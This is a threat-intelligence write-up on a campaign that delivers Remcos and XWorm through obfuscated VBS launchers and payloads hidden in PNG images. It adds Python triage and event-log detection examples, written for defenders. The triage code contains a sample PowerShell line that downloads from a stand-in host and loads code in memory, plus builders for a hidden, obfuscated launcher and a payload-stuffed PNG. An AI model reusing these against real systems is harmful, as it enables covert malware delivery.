A multi-stage malware campaign has emerged that chains obfuscated Visual Basic Script (VBS) launchers, PNG-hosted loaders and remote access trojans (RATs) to compromise systems while keeping the final payloads off disk, where file-based scanning would catch them.
What first surfaced as a routine endpoint alert in early 2026 turned out to be one branch of a larger operation: several distinct infection chains, each delivering a different payload, all served from the same attacker-controlled infrastructure.
Detection and Initial Findings
The first indication of the campaign was a suspicious VBS file, Name_File.vbs, found in the Users\Public\Downloads directory of an infected system. SentinelOne's endpoint protection intercepted and quarantined the file before it ran, but its encoded contents warranted further analysis.
Decoding it revealed a Base64-encoded PowerShell command containing external URLs, a clear sign that the script's only job was to fetch further stages from a remote server.
LevelBlue analysts found that this single event was part of a broader operation. Their SpiderLabs Cyber Threat Intelligence team identified an attacker-controlled domain hosting multiple obfuscated VBS files, each tied to a different payload, including XWorm variants and Remcos RAT.
Infrastructure and Attack Vectors
The attackers used the domain news4me[.]xyz with open directories such as /coupon/, /protector/ and /invoice/, each serving a specific role, such as staging VBS launchers or hosting obfuscated payload files.
Because the launchers only reference URLs, this open-directory layout lets the operators swap or rotate hosted payloads without touching the delivery logic, so blocking a single file or hash does little against the campaign as a whole.
Investigators also uncovered a separate infection chain built around a fake PDF lure, further confirming the campaign's multi-vector approach.
Inside the Infection Mechanism
The chain begins with a VBS launcher that contains no malicious logic of its own: once the Unicode obfuscation is stripped, all that remains is a Base64-encoded PowerShell command, which serves as a fileless loader.
That command forces TLS 1.2 and uses the Net.WebClient class to download a PNG image, MSI_PRO_with_b64.png. The image renders normally, but between two custom marker strings it carries encoded data: the PhantomVAI loader, which the PowerShell stage decodes and loads straight into memory. No executable is ever written to disk, so file-based scanning has nothing to inspect and the outbound request looks like an ordinary image fetch.
Once running, PhantomVAI retrieves two more resources. The first, news4me[.]xyz/protector/johnremcos.txt, decodes to a Remcos RAT payload that gives the operator persistent remote access. The second, uac.png, carries a DLL that performs a UAC bypass so the RAT can obtain elevated privileges without prompting the user.
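The three steps above (strip the Unicode obfuscation, decode the -EncodedCommand argument, carve the stash out of the PNG) are what an analyst repeats by hand on every new launcher from the open directory. The following script is an added example, not the campaign's code or any vendor's tooling: it assumes the obfuscation is interleaved invisible Unicode characters, uses the marker strings <<BASE64_START>> / <<BASE64_END>> and the host staging.example purely as assumptions, and builds its own sample VBS and PNG so that it runs offline. Read the real markers and URLs off your own decoded launcher.

```python
"""Triage helpers for the VBS -> encoded PowerShell -> PNG chain described above.

Added example, not the campaign's code or any vendor tooling. The obfuscation
style (interleaved invisible Unicode characters), the marker strings, the host
staging.example and every artifact built below are constructed assumptions.
"""
import base64
import re
import struct
import unicodedata
import zlib

# Markers that bracket the stash inside the PNG (assumed; PhantomVAI-style).
MARK_START, MARK_END = b"<<BASE64_START>>", b"<<BASE64_END>>"
PNG_SIG = b"\x89PNG\r\n\x1a\n"
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)
URL_RE = re.compile(r'https?://[^\s\'")]+', re.I)


def strip_unicode_noise(text: str) -> str:
    """Remove zero-width and other format characters (Unicode category Cf)
    interleaved with the real VBS tokens to defeat string matching."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


def decode_encoded_command(vbs: str) -> str:
    """Pull the -EncodedCommand argument out of the WScript.Shell Run line.
    powershell.exe expects Base64 of UTF-16LE text, not UTF-8."""
    m = ENC_RE.search(vbs)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def carve_between_markers(png: bytes, start: bytes = MARK_START, end: bytes = MARK_END) -> bytes:
    """Return the Base64-decoded bytes sitting between two marker strings in an
    otherwise valid PNG; the loader does the same with IndexOf/Substring."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    i = png.find(start)
    j = png.find(end, i + len(start)) if i != -1 else -1
    if i == -1 or j == -1:
        raise ValueError("markers not found")
    return base64.b64decode(png[i + len(start):j])


def triage(vbs_text: str, png_bytes: bytes) -> dict:
    """Run the whole chain offline: deobfuscate, decode, list URLs, carve."""
    ps = decode_encoded_command(strip_unicode_noise(vbs_text))
    payload = carve_between_markers(png_bytes)
    return {
        "powershell": ps,
        "urls": URL_RE.findall(ps),
        "forces_tls12": "Tls12" in ps,
        "in_memory_load": "Reflection.Assembly]::Load" in ps,
        "payload": payload,
        "payload_is_pe": payload.startswith(b"MZ"),
    }


# --- constructed sample artifacts (not real campaign files) ---------------

SAMPLE_PS = (
    "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;"
    "$b=(New-Object Net.WebClient).DownloadString("
    "'http://staging.example/coupon/MSI_PRO_with_b64.png');"
    "$s=$b.IndexOf('<<BASE64_START>>')+16;$e=$b.IndexOf('<<BASE64_END>>');"
    "$d=[Convert]::FromBase64String($b.Substring($s,$e-$s));"
    "[Reflection.Assembly]::Load($d).EntryPoint.Invoke($null,$null)"
)


def build_sample_vbs(ps: str = SAMPLE_PS) -> str:
    """VBS launcher with a zero-width space inserted after every character."""
    enc = base64.b64encode(ps.encode("utf-16-le")).decode()
    clean = ('Set sh = CreateObject("WScript.Shell")\r\n'
             f'sh.Run "powershell -w hidden -ep bypass -enc {enc}", 0, False\r\n')
    return "\u200b".join(clean) + "\u200b"


def _chunk(kind: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def build_sample_png(payload: bytes) -> bytes:
    """Valid 1x1 RGB PNG with the Base64 payload appended after IEND; image
    viewers ignore trailing bytes, so the file still renders as a picture."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + MARK_START + base64.b64encode(payload) + MARK_END)


if __name__ == "__main__":
    report = triage(build_sample_vbs(), build_sample_png(b"MZ\x90\x00fake-loader"))
    for k, v in report.items():
        print(f"{k}: {v[:16]!r}" if k == "payload" else f"{k}: {v}")
```

The carved bytes are the only artifact in the chain that is never written to disk by the malware itself, so carving them is what lets you hash and classify the loader; the URLs pulled from the decoded command are the indicators worth feeding to the proxy and DNS blocklists.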
Response and Prevention Measures
Organizations should restrict execution of .vbs and .bat files from user-writable directories such as Users\Public, enforce constrained PowerShell policies and enable script block logging so that fileless stages are still recorded even though nothing reaches disk. At the network level, blocking WebDAV-based connections and filtering .xyz domains can limit access to the attacker infrastructure.
Pairing endpoint protection with a full threat intelligence investigation is essential: closing a single alert is not enough while the infrastructure behind it remains live and easy to re-point.
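Script block logging is what makes the fileless stage visible: the decoded PowerShell text lands in the event log even though no file was written. As an added example, not a vendor rule or anything from the page, the following detection logic scores constructed process-creation and script-block events modelled on Windows 4688 and 4104 records; the field names and every sample line are assumptions.

```python
"""Detection logic for the launcher chain above, run over constructed telemetry.

Added example, not a vendor rule or the page's own material. The records mimic
Windows 4688 process-creation and 4104 PowerShell script block logging events,
but every line and the field names are hand-written assumptions.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\users\\public\\|\\appdata\\local\\temp\\|\\downloads\\", re.I)
ENC_FLAG = re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

# Each indicator is common on its own; a script block matching three or more
# looks like a fileless downloader-and-loader rather than admin tooling.
SCRIPT_BLOCK_INDICATORS = {
    "web_download": re.compile(r"Net\.WebClient|Invoke-WebRequest|Download(?:String|Data|File)", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b", re.I),
    "forced_tls12": re.compile(r"SecurityProtocolType\]::Tls12", re.I),
}


def score_process(ev: dict) -> list[str]:
    """4688: PowerShell launched by a script host, from a user-writable path,
    with a hidden window and an encoded command."""
    hits = []
    parent = ev.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("command_line", "")
    if parent in SCRIPT_HOSTS and image.startswith("powershell"):
        hits.append("powershell spawned by script host")
    if USER_WRITABLE.search(ev.get("parent_command_line", "")):
        hits.append("script run from user-writable directory")
    if ENC_FLAG.search(cmd):
        hits.append("encoded command")
    if HIDDEN.search(cmd):
        hits.append("hidden window")
    return hits


def score_script_block(ev: dict) -> list[str]:
    """4104: the decoded script text, which logging captures even when the
    stage never touches disk."""
    text = ev.get("script_block_text", "")
    return [name for name, rx in SCRIPT_BLOCK_INDICATORS.items() if rx.search(text)]


def evaluate(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (record id, matched indicators) for every event over threshold."""
    findings = []
    for ev in events:
        if ev["event_id"] == 4688:
            hits, threshold = score_process(ev), 2
        elif ev["event_id"] == 4104:
            hits, threshold = score_script_block(ev), 3
        else:
            continue
        if len(hits) >= threshold:
            findings.append((ev["record"], hits))
    return findings


# Constructed sample telemetry: two events from the chain above, two benign.
SAMPLE_EVENTS = [
    {"record": 1, "event_id": 4688,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "parent_command_line": r'wscript.exe "C:\Users\Public\Downloads\Name_File.vbs"',
     "command_line": "powershell -w hidden -ep bypass -enc QQBBAEEAQQBBAEEAQQBBAEEAQQA="},
    {"record": 2, "event_id": 4104,
     "script_block_text": "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;"
                          "$b=(New-Object Net.WebClient).DownloadString('http://staging.example/coupon/x.png');"
                          "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"},
    {"record": 3, "event_id": 4688,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "parent_command_line": "explorer.exe",
     "command_line": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    {"record": 4, "event_id": 4104,
     "script_block_text": "Get-ChildItem -Path C:\\Logs -Filter *.log | Measure-Object"},
]

if __name__ == "__main__":
    for record, hits in evaluate(SAMPLE_EVENTS):
        print(f"record {record}: {', '.join(hits)}")
```

The process rule catches the launcher regardless of what the PNG contains, and the script-block rule catches the loader even if the VBS is replaced by another lure, which is the point of detecting behaviour rather than the hashes an open directory lets the operator rotate at will.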
